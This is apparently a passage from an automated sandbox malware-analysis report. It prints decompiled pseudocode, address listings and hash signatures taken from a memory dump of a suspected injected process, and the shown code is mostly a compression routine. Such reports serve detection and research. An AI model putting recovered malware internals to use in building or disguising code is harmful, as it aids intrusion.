                                                                                                                                                                        • Opcode ID: 796bb165decc8d8bd82f3cdaedd1b757c7167d48cee4eb04fee3634c05f0f4c5
                                                                                                                                                                        • Instruction ID: bd7a5deb3ebdd382e6e31b3523bc994e6b605b047dde88f0fa960ef1c3ca4fb8
                                                                                                                                                                        • Opcode Fuzzy Hash: 796bb165decc8d8bd82f3cdaedd1b757c7167d48cee4eb04fee3634c05f0f4c5
                                                                                                                                                                        • Instruction Fuzzy Hash: F731F432E1021AAFEF24DB94CC46BFEB779BB46700F148652E205B2141D778AA809791
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 99%
                                                                                                                                                                        			E007B4100(int _a4, signed int _a8) {
                                                                                                                                                                        				int _v8;
                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				void* _t137;
                                                                                                                                                                        				signed int _t141;
                                                                                                                                                                        				intOrPtr* _t142;
                                                                                                                                                                        				signed int _t145;
                                                                                                                                                                        				signed int _t146;
                                                                                                                                                                        				intOrPtr _t151;
                                                                                                                                                                        				intOrPtr _t161;
                                                                                                                                                                        				intOrPtr _t162;
                                                                                                                                                                        				intOrPtr _t167;
                                                                                                                                                                        				intOrPtr _t170;
                                                                                                                                                                        				signed int _t172;
                                                                                                                                                                        				intOrPtr _t173;
                                                                                                                                                                        				int _t184;
                                                                                                                                                                        				intOrPtr _t185;
                                                                                                                                                                        				intOrPtr _t188;
                                                                                                                                                                        				signed int _t189;
                                                                                                                                                                        				void* _t195;
                                                                                                                                                                        				int _t202;
                                                                                                                                                                        				int _t208;
                                                                                                                                                                        				intOrPtr _t217;
                                                                                                                                                                        				signed int _t218;
                                                                                                                                                                        				int _t219;
                                                                                                                                                                        				intOrPtr _t220;
                                                                                                                                                                        				signed int _t221;
                                                                                                                                                                        				signed int _t222;
                                                                                                                                                                        				int _t224;
                                                                                                                                                                        				int _t225;
                                                                                                                                                                        				signed int _t227;
                                                                                                                                                                        				intOrPtr _t228;
                                                                                                                                                                        				int _t232;
                                                                                                                                                                        				int _t234;
                                                                                                                                                                        				signed int _t235;
                                                                                                                                                                        				int _t239;
                                                                                                                                                                        				void* _t240;
                                                                                                                                                                        				int _t245;
                                                                                                                                                                        				int _t252;
                                                                                                                                                                        				signed int _t253;
                                                                                                                                                                        				int _t254;
                                                                                                                                                                        				void* _t257;
                                                                                                                                                                        				void* _t258;
                                                                                                                                                                        				int _t259;
                                                                                                                                                                        				intOrPtr _t260;
                                                                                                                                                                        				int _t261;
                                                                                                                                                                        				signed int _t269;
                                                                                                                                                                        				signed int _t271;
                                                                                                                                                                        				intOrPtr* _t272;
                                                                                                                                                                        				void* _t273;
                                                                                                                                                                        
                                                                                                                                                                        				_t253 = _a8;
                                                                                                                                                                        				_t272 = _a4;
                                                                                                                                                                        				_t3 = _t272 + 0xc; // 0x452bf84d
                                                                                                                                                                        				_t4 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                        				_t228 =  *_t4;
                                                                                                                                                                        				_t137 =  *_t3 + 0xfffffffb;
                                                                                                                                                                        				_t229 =  <=  ? _t137 : _t228;
                                                                                                                                                                        				_v16 =  <=  ? _t137 : _t228;
                                                                                                                                                                        				_t269 = 0;
                                                                                                                                                                        				_a4 =  *((intOrPtr*)( *_t272 + 4));
                                                                                                                                                                        				asm("o16 nop [eax+eax]");
                                                                                                                                                                        				while(1) {
                                                                                                                                                                        					_t8 = _t272 + 0x16bc; // 0xfed1e900
                                                                                                                                                                        					_t141 =  *_t8 + 0x2a >> 3;
                                                                                                                                                                        					_v12 = 0xffff;
                                                                                                                                                                        					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
                                                                                                                                                                        					if(_t217 < _t141) {
                                                                                                                                                                        						break;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t11 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                        					_t12 = _t272 + 0x5c; // 0xbde85000
                                                                                                                                                                        					_t245 =  *_t11 -  *_t12;
                                                                                                                                                                        					_v8 = _t245;
                                                                                                                                                                        					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
                                                                                                                                                                        					_t247 =  <  ? _t195 : _v12;
                                                                                                                                                                        					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
                                                                                                                                                                        					if(_t227 >= _v16) {
                                                                                                                                                                        						L7:
                                                                                                                                                                        						if(_t253 != 4) {
                                                                                                                                                                        							L10:
                                                                                                                                                                        							_t269 = 0;
                                                                                                                                                                        							__eflags = 0;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_t285 = _t227 - _t195;
                                                                                                                                                                        							if(_t227 != _t195) {
                                                                                                                                                                        								goto L10;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_t269 = _t253 - 3;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						E007B7120(_t272, _t272, 0, 0, _t269);
                                                                                                                                                                        						_t18 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                        						_t19 = _t272 + 8; // 0x8d000040
                                                                                                                                                                        						 *( *_t18 +  *_t19 - 4) = _t227;
                                                                                                                                                                        						_t22 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                        						_t23 = _t272 + 8; // 0x8d000040
                                                                                                                                                                        						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
                                                                                                                                                                        						_t26 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                        						_t27 = _t272 + 8; // 0x8d000040
                                                                                                                                                                        						 *( *_t26 +  *_t27 - 2) =  !_t227;
                                                                                                                                                                        						_t30 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                        						_t31 = _t272 + 8; // 0x8d000040
                                                                                                                                                                        						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
                                                                                                                                                                        						E007B5E80(_t285,  *_t272);
                                                                                                                                                                        						_t202 = _v8;
                                                                                                                                                                        						_t273 = _t273 + 0x14;
                                                                                                                                                                        						if(_t202 != 0) {
                                                                                                                                                                        							_t208 =  >  ? _t227 : _t202;
                                                                                                                                                                        							_v8 = _t208;
                                                                                                                                                                        							_t36 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                        							_t37 = _t272 + 0x5c; // 0xbde85000
                                                                                                                                                                        							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
                                                                                                                                                                        							_t273 = _t273 + 0xc;
                                                                                                                                                                        							_t252 = _v8;
                                                                                                                                                                        							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
                                                                                                                                                                        							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
                                                                                                                                                                        							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
                                                                                                                                                                        							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
                                                                                                                                                                        							_t227 = _t227 - _t252;
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_t227 != 0) {
                                                                                                                                                                        							E007B5FC0( *_t272,  *( *_t272 + 0xc), _t227);
                                                                                                                                                                        							_t273 = _t273 + 0xc;
                                                                                                                                                                        							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
                                                                                                                                                                        							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
                                                                                                                                                                        							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t253 = _a8;
                                                                                                                                                                        						if(_t269 == 0) {
                                                                                                                                                                        							continue;
                                                                                                                                                                        						}
                                                                                                                                                                        					} else {
                                                                                                                                                                        						if(_t227 != 0 || _t253 == 4) {
                                                                                                                                                                        							if(_t253 != 0 && _t227 == _t195) {
                                                                                                                                                                        								goto L7;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        					break;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t142 =  *_t272;
                                                                                                                                                                        				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
                                                                                                                                                                        				_a4 = _t232;
                                                                                                                                                                        				if(_t232 == 0) {
                                                                                                                                                                        					_t83 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                        					_t254 =  *_t83;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t59 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                        					_t224 =  *_t59;
                                                                                                                                                                        					if(_t232 < _t224) {
                                                                                                                                                                        						_t65 = _t272 + 0x3c; // 0x830cc483
                                                                                                                                                                        						_t66 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                        						_t260 =  *_t66;
                                                                                                                                                                        						__eflags =  *_t65 - _t260 - _t232;
                                                                                                                                                                        						if( *_t65 - _t260 <= _t232) {
                                                                                                                                                                        							_t67 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                        							_t261 = _t260 - _t224;
                                                                                                                                                                        							 *(_t272 + 0x6c) = _t261;
                                                                                                                                                                        							memcpy( *_t67,  *_t67 + _t224, _t261);
                                                                                                                                                                        							_t70 = _t272 + 0x16b0; // 0x8341ffff
                                                                                                                                                                        							_t188 =  *_t70;
                                                                                                                                                                        							_t273 = _t273 + 0xc;
                                                                                                                                                                        							_t232 = _a4;
                                                                                                                                                                        							__eflags = _t188 - 2;
                                                                                                                                                                        							if(_t188 < 2) {
                                                                                                                                                                        								_t189 = _t188 + 1;
                                                                                                                                                                        								__eflags = _t189;
                                                                                                                                                                        								 *(_t272 + 0x16b0) = _t189;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						_t73 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                        						_t74 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                        						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
                                                                                                                                                                        						_t225 = _a4;
                                                                                                                                                                        						_t273 = _t273 + 0xc;
                                                                                                                                                                        						_t76 = _t272 + 0x6c;
                                                                                                                                                                        						 *_t76 =  *(_t272 + 0x6c) + _t225;
                                                                                                                                                                        						__eflags =  *_t76;
                                                                                                                                                                        						_t78 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                        						_t184 =  *_t78;
                                                                                                                                                                        						_t79 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                        						_t239 =  *_t79;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						 *(_t272 + 0x16b0) = 2;
                                                                                                                                                                        						_t61 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                        						memcpy( *_t61,  *_t142 - _t224, _t224);
                                                                                                                                                                        						_t62 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                        						_t184 =  *_t62;
                                                                                                                                                                        						_t273 = _t273 + 0xc;
                                                                                                                                                                        						_t225 = _a4;
                                                                                                                                                                        						_t239 = _t184;
                                                                                                                                                                        						 *(_t272 + 0x6c) = _t184;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t254 = _t184;
                                                                                                                                                                        					 *(_t272 + 0x5c) = _t184;
                                                                                                                                                                        					_t81 = _t272 + 0x16b4; // 0xed7505f9
                                                                                                                                                                        					_t185 =  *_t81;
                                                                                                                                                                        					_t240 = _t239 - _t185;
                                                                                                                                                                        					_t241 =  <=  ? _t225 : _t240;
                                                                                                                                                                        					_t242 = ( <=  ? _t225 : _t240) + _t185;
                                                                                                                                                                        					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
                                                                                                                                                                        				}
                                                                                                                                                                        				if( *(_t272 + 0x16c0) < _t254) {
                                                                                                                                                                        					 *(_t272 + 0x16c0) = _t254;
                                                                                                                                                                        				}
                                                                                                                                                                        				if(_t269 == 0) {
                                                                                                                                                                        					_t218 = _a8;
                                                                                                                                                                        					__eflags = _t218;
                                                                                                                                                                        					if(_t218 == 0) {
                                                                                                                                                                        						L34:
                                                                                                                                                                        						_t89 = _t272 + 0x3c; // 0x830cc483
                                                                                                                                                                        						_t219 =  *_t272;
                                                                                                                                                                        						_t145 =  *_t89 - _t254 - 1;
                                                                                                                                                                        						_a4 =  *_t272;
                                                                                                                                                                        						_t234 = _t254;
                                                                                                                                                                        						_v16 = _t145;
                                                                                                                                                                        						_v8 = _t254;
                                                                                                                                                                        						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
                                                                                                                                                                        						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
                                                                                                                                                                        							_v8 = _t254;
                                                                                                                                                                        							_t95 = _t272 + 0x5c; // 0xbde85000
                                                                                                                                                                        							_a4 = _t219;
                                                                                                                                                                        							_t234 = _t254;
                                                                                                                                                                        							_t97 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                        							__eflags =  *_t95 -  *_t97;
                                                                                                                                                                        							if( *_t95 >=  *_t97) {
                                                                                                                                                                        								_t98 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                        								_t167 =  *_t98;
                                                                                                                                                                        								_t259 = _t254 - _t167;
                                                                                                                                                                        								_t99 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                        								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
                                                                                                                                                                        								 *(_t272 + 0x6c) = _t259;
                                                                                                                                                                        								memcpy( *_t99, _t167 +  *_t99, _t259);
                                                                                                                                                                        								_t103 = _t272 + 0x16b0; // 0x8341ffff
                                                                                                                                                                        								_t170 =  *_t103;
                                                                                                                                                                        								_t273 = _t273 + 0xc;
                                                                                                                                                                        								__eflags = _t170 - 2;
                                                                                                                                                                        								if(_t170 < 2) {
                                                                                                                                                                        									_t172 = _t170 + 1;
                                                                                                                                                                        									__eflags = _t172;
                                                                                                                                                                        									 *(_t272 + 0x16b0) = _t172;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t106 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                        								_t145 = _v16 +  *_t106;
                                                                                                                                                                        								__eflags = _t145;
                                                                                                                                                                        								_a4 =  *_t272;
                                                                                                                                                                        								_t108 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                        								_t234 =  *_t108;
                                                                                                                                                                        								_v8 = _t234;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						_t255 = _a4;
                                                                                                                                                                        						_t220 =  *((intOrPtr*)(_a4 + 4));
                                                                                                                                                                        						__eflags = _t145 - _t220;
                                                                                                                                                                        						_t221 =  <=  ? _t145 : _t220;
                                                                                                                                                                        						_t146 = _t221;
                                                                                                                                                                        						_a4 = _t221;
                                                                                                                                                                        						_t222 = _a8;
                                                                                                                                                                        						__eflags = _t146;
                                                                                                                                                                        						if(_t146 != 0) {
                                                                                                                                                                        							_t114 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                        							E007B5FC0(_t255,  *_t114 + _v8, _t146);
                                                                                                                                                                        							_t273 = _t273 + 0xc;
                                                                                                                                                                        							_t117 = _t272 + 0x6c;
                                                                                                                                                                        							 *_t117 =  *(_t272 + 0x6c) + _a4;
                                                                                                                                                                        							__eflags =  *_t117;
                                                                                                                                                                        							_t119 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                        							_t234 =  *_t119;
                                                                                                                                                                        						}
                                                                                                                                                                        						__eflags =  *(_t272 + 0x16c0) - _t234;
                                                                                                                                                                        						if( *(_t272 + 0x16c0) < _t234) {
                                                                                                                                                                        							 *(_t272 + 0x16c0) = _t234;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t122 = _t272 + 0x16bc; // 0xfed1e900
                                                                                                                                                                        						_t123 = _t272 + 0xc; // 0x452bf84d
                                                                                                                                                                        						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
                                                                                                                                                                        						__eflags = _t257 - 0xffff;
                                                                                                                                                                        						_t258 =  >  ? 0xffff : _t257;
                                                                                                                                                                        						_t124 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                        						_t151 =  *_t124;
                                                                                                                                                                        						_t125 = _t272 + 0x5c; // 0xbde85000
                                                                                                                                                                        						_t235 = _t234 -  *_t125;
                                                                                                                                                                        						__eflags = _t258 - _t151;
                                                                                                                                                                        						_t152 =  <=  ? _t258 : _t151;
                                                                                                                                                                        						__eflags = _t235 - ( <=  ? _t258 : _t151);
                                                                                                                                                                        						if(_t235 >= ( <=  ? _t258 : _t151)) {
                                                                                                                                                                        							L49:
                                                                                                                                                                        							__eflags = _t235 - _t258;
                                                                                                                                                                        							_t154 =  >  ? _t258 : _t235;
                                                                                                                                                                        							_a4 =  >  ? _t258 : _t235;
                                                                                                                                                                        							__eflags = _t222 - 4;
                                                                                                                                                                        							if(_t222 != 4) {
                                                                                                                                                                        								L53:
                                                                                                                                                                        								_t269 = 0;
                                                                                                                                                                        								__eflags = 0;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_t161 =  *_t272;
                                                                                                                                                                        								__eflags =  *(_t161 + 4);
                                                                                                                                                                        								_t154 = _a4;
                                                                                                                                                                        								if( *(_t161 + 4) != 0) {
                                                                                                                                                                        									goto L53;
                                                                                                                                                                        								} else {
                                                                                                                                                                        									__eflags = _t154 - _t235;
                                                                                                                                                                        									if(_t154 != _t235) {
                                                                                                                                                                        										goto L53;
                                                                                                                                                                        									} else {
                                                                                                                                                                        										_t269 = _t222 - 3;
                                                                                                                                                                        									}
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        							_t131 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                        							_t132 = _t272 + 0x5c; // 0xbde85000
                                                                                                                                                                        							E007B7120(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
                                                                                                                                                                        							_t134 = _t272 + 0x5c;
                                                                                                                                                                        							 *_t134 =  *(_t272 + 0x5c) + _a4;
                                                                                                                                                                        							__eflags =  *_t134;
                                                                                                                                                                        							E007B5E80( *_t134,  *_t272);
                                                                                                                                                                        						} else {
                                                                                                                                                                        							__eflags = _t235;
                                                                                                                                                                        							if(_t235 != 0) {
                                                                                                                                                                        								L46:
                                                                                                                                                                        								__eflags = _t222;
                                                                                                                                                                        								if(_t222 != 0) {
                                                                                                                                                                        									_t162 =  *_t272;
                                                                                                                                                                        									__eflags =  *(_t162 + 4);
                                                                                                                                                                        									if( *(_t162 + 4) == 0) {
                                                                                                                                                                        										__eflags = _t235 - _t258;
                                                                                                                                                                        										if(_t235 <= _t258) {
                                                                                                                                                                        											goto L49;
                                                                                                                                                                        										}
                                                                                                                                                                        									}
                                                                                                                                                                        								}
                                                                                                                                                                        							} else {
                                                                                                                                                                        								__eflags = _t222 - 4;
                                                                                                                                                                        								if(_t222 == 4) {
                                                                                                                                                                        									goto L46;
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						asm("sbb edi, edi");
                                                                                                                                                                        						_t271 =  ~_t269 & 0x00000002;
                                                                                                                                                                        						__eflags = _t271;
                                                                                                                                                                        						return _t271;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						__eflags = _t218 - 4;
                                                                                                                                                                        						if(_t218 == 4) {
                                                                                                                                                                        							goto L34;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_t173 =  *_t272;
                                                                                                                                                                        							__eflags =  *(_t173 + 4);
                                                                                                                                                                        							if( *(_t173 + 4) != 0) {
                                                                                                                                                                        								goto L34;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_t88 = _t272 + 0x5c; // 0xbde85000
                                                                                                                                                                        								__eflags = _t254 -  *_t88;
                                                                                                                                                                        								if(_t254 !=  *_t88) {
                                                                                                                                                                        									goto L34;
                                                                                                                                                                        								} else {
                                                                                                                                                                        									return 1;
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        				} else {
                                                                                                                                                                        					return 3;
                                                                                                                                                                        				}
                                                                                                                                                                        			}






















































                                                                                                                                                                        0x007b435e
                                                                                                                                                                        0x007b435f
                                                                                                                                                                        0x007b4362
                                                                                                                                                                        0x007b4364
                                                                                                                                                                        0x007b4367
                                                                                                                                                                        0x007b436a
                                                                                                                                                                        0x007b436d
                                                                                                                                                                        0x007b4371
                                                                                                                                                                        0x007b4374
                                                                                                                                                                        0x007b4377
                                                                                                                                                                        0x007b437a
                                                                                                                                                                        0x007b437c
                                                                                                                                                                        0x007b437c
                                                                                                                                                                        0x007b437f
                                                                                                                                                                        0x007b4381
                                                                                                                                                                        0x007b4381
                                                                                                                                                                        0x007b4384
                                                                                                                                                                        0x007b4386
                                                                                                                                                                        0x007b4389
                                                                                                                                                                        0x007b4391
                                                                                                                                                                        0x007b4394
                                                                                                                                                                        0x007b4399
                                                                                                                                                                        0x007b4399
                                                                                                                                                                        0x007b439f
                                                                                                                                                                        0x007b43a2
                                                                                                                                                                        0x007b43a5
                                                                                                                                                                        0x007b43a7
                                                                                                                                                                        0x007b43a7
                                                                                                                                                                        0x007b43a8
                                                                                                                                                                        0x007b43a8
                                                                                                                                                                        0x007b43b3
                                                                                                                                                                        0x007b43b3
                                                                                                                                                                        0x007b43b3
                                                                                                                                                                        0x007b43b6
                                                                                                                                                                        0x007b43b9
                                                                                                                                                                        0x007b43b9
                                                                                                                                                                        0x007b43bc
                                                                                                                                                                        0x007b43bc
                                                                                                                                                                        0x007b437f
                                                                                                                                                                        0x007b43bf
                                                                                                                                                                        0x007b43c2
                                                                                                                                                                        0x007b43c5
                                                                                                                                                                        0x007b43c7
                                                                                                                                                                        0x007b43ca
                                                                                                                                                                        0x007b43cc
                                                                                                                                                                        0x007b43cf
                                                                                                                                                                        0x007b43d2
                                                                                                                                                                        0x007b43d4
                                                                                                                                                                        0x007b43d7
                                                                                                                                                                        0x007b43df
                                                                                                                                                                        0x007b43e7
                                                                                                                                                                        0x007b43ea
                                                                                                                                                                        0x007b43ea
                                                                                                                                                                        0x007b43ea
                                                                                                                                                                        0x007b43ed
                                                                                                                                                                        0x007b43ed
                                                                                                                                                                        0x007b43ed
                                                                                                                                                                        0x007b43f0
                                                                                                                                                                        0x007b43f6
                                                                                                                                                                        0x007b43f8
                                                                                                                                                                        0x007b43f8
                                                                                                                                                                        0x007b43fe
                                                                                                                                                                        0x007b4404
                                                                                                                                                                        0x007b440d
                                                                                                                                                                        0x007b4414
                                                                                                                                                                        0x007b4416
                                                                                                                                                                        0x007b4419
                                                                                                                                                                        0x007b4419
                                                                                                                                                                        0x007b441c
                                                                                                                                                                        0x007b441c
                                                                                                                                                                        0x007b441f
                                                                                                                                                                        0x007b4421
                                                                                                                                                                        0x007b4424
                                                                                                                                                                        0x007b4426
                                                                                                                                                                        0x007b4441
                                                                                                                                                                        0x007b4441
                                                                                                                                                                        0x007b4445
                                                                                                                                                                        0x007b4448
                                                                                                                                                                        0x007b444b
                                                                                                                                                                        0x007b444e
                                                                                                                                                                        0x007b4464
                                                                                                                                                                        0x007b4464
                                                                                                                                                                        0x007b4464
                                                                                                                                                                        0x007b4450
                                                                                                                                                                        0x007b4450
                                                                                                                                                                        0x007b4452
                                                                                                                                                                        0x007b4456
                                                                                                                                                                        0x007b4459
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b445b
                                                                                                                                                                        0x007b445b
                                                                                                                                                                        0x007b445d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b445f
                                                                                                                                                                        0x007b445f
                                                                                                                                                                        0x007b445f
                                                                                                                                                                        0x007b445d
                                                                                                                                                                        0x007b4459
                                                                                                                                                                        0x007b4468
                                                                                                                                                                        0x007b446b
                                                                                                                                                                        0x007b4470
                                                                                                                                                                        0x007b447a
                                                                                                                                                                        0x007b447a
                                                                                                                                                                        0x007b447a
                                                                                                                                                                        0x007b447d
                                                                                                                                                                        0x007b4428
                                                                                                                                                                        0x007b4428
                                                                                                                                                                        0x007b442a
                                                                                                                                                                        0x007b4431
                                                                                                                                                                        0x007b4431
                                                                                                                                                                        0x007b4433
                                                                                                                                                                        0x007b4435
                                                                                                                                                                        0x007b4437
                                                                                                                                                                        0x007b443b
                                                                                                                                                                        0x007b443d
                                                                                                                                                                        0x007b443f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b443f
                                                                                                                                                                        0x007b443b
                                                                                                                                                                        0x007b442c
                                                                                                                                                                        0x007b442c
                                                                                                                                                                        0x007b442f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b442f
                                                                                                                                                                        0x007b442a
                                                                                                                                                                        0x007b4487
                                                                                                                                                                        0x007b4489
                                                                                                                                                                        0x007b4489
                                                                                                                                                                        0x007b4494
                                                                                                                                                                        0x007b4337
                                                                                                                                                                        0x007b4337
                                                                                                                                                                        0x007b433a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b433c
                                                                                                                                                                        0x007b433c
                                                                                                                                                                        0x007b433e
                                                                                                                                                                        0x007b4342
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b4344
                                                                                                                                                                        0x007b4344
                                                                                                                                                                        0x007b4344
                                                                                                                                                                        0x007b4347
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b434b
                                                                                                                                                                        0x007b4354
                                                                                                                                                                        0x007b4354
                                                                                                                                                                        0x007b4347
                                                                                                                                                                        0x007b4342
                                                                                                                                                                        0x007b433a
                                                                                                                                                                        0x007b4326
                                                                                                                                                                        0x007b432f
                                                                                                                                                                        0x007b432f

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3510742995-0
                                                                                                                                                                        • Opcode ID: d78685e2831b4aa8f0c5c5e600617b722de4f40544eb307eba323e3ebd37dfb5
                                                                                                                                                                        • Instruction ID: 4c82e41e9aaf146577cc108026d03d18190198631e5c0346b1ef51fd4dc6abbf
                                                                                                                                                                        • Opcode Fuzzy Hash: d78685e2831b4aa8f0c5c5e600617b722de4f40544eb307eba323e3ebd37dfb5
                                                                                                                                                                        • Instruction Fuzzy Hash: 05D10371A007049FCB24CF6DD8C4AAAB7E5FF98304B28896DE88AC7702D735E945CB55
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: \u%04X$\u%04X\u%04X
                                                                                                                                                                        • API String ID: 0-1155366105
                                                                                                                                                                        • Opcode ID: 7f1af1f36f8ff582b57b669276bf22abd65b1f74bc63a8052c1b73d4b2846b06
                                                                                                                                                                        • Instruction ID: 158778a6d568b12b5a714f433bfcab3ff705a3eac3385212c028114a26821629
                                                                                                                                                                        • Opcode Fuzzy Hash: 7f1af1f36f8ff582b57b669276bf22abd65b1f74bc63a8052c1b73d4b2846b06
                                                                                                                                                                        • Instruction Fuzzy Hash: 8141D8B160024EA7DB284EAC9DBDBFF3A59DF01310FD44066FA16E6281E26DDD90D2D1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 89%
                                                                                                                                                                        			E007AD218(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                                                                                                        				char _v8;
                                                                                                                                                                        				char _v12;
                                                                                                                                                                        				char _v140;
                                                                                                                                                                        				signed char _t14;
                                                                                                                                                                        				char _t15;
                                                                                                                                                                        				intOrPtr _t20;
                                                                                                                                                                        				void* _t25;
                                                                                                                                                                        				intOrPtr _t26;
                                                                                                                                                                        				intOrPtr _t32;
                                                                                                                                                                        				WCHAR* _t34;
                                                                                                                                                                        				intOrPtr _t35;
                                                                                                                                                                        				struct HINSTANCE__* _t37;
                                                                                                                                                                        				intOrPtr _t38;
                                                                                                                                                                        				intOrPtr _t46;
                                                                                                                                                                        				void* _t47;
                                                                                                                                                                        				intOrPtr _t50;
                                                                                                                                                                        				void* _t60;
                                                                                                                                                                        				void* _t61;
                                                                                                                                                                        				char _t62;
                                                                                                                                                                        				void* _t65;
                                                                                                                                                                        				intOrPtr _t66;
                                                                                                                                                                        				char _t68;
                                                                                                                                                                        
                                                                                                                                                                        				_t65 = __esi;
                                                                                                                                                                        				_t61 = __edi;
                                                                                                                                                                        				_t47 = __ebx;
                                                                                                                                                                        				_t50 =  *0x7bf81c; // 0x7d0000
                                                                                                                                                                        				_t14 =  *(_t50 + 0x1898);
                                                                                                                                                                        				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
                                                                                                                                                                        					_t15 = E007A9DF2(_t50, 0x392);
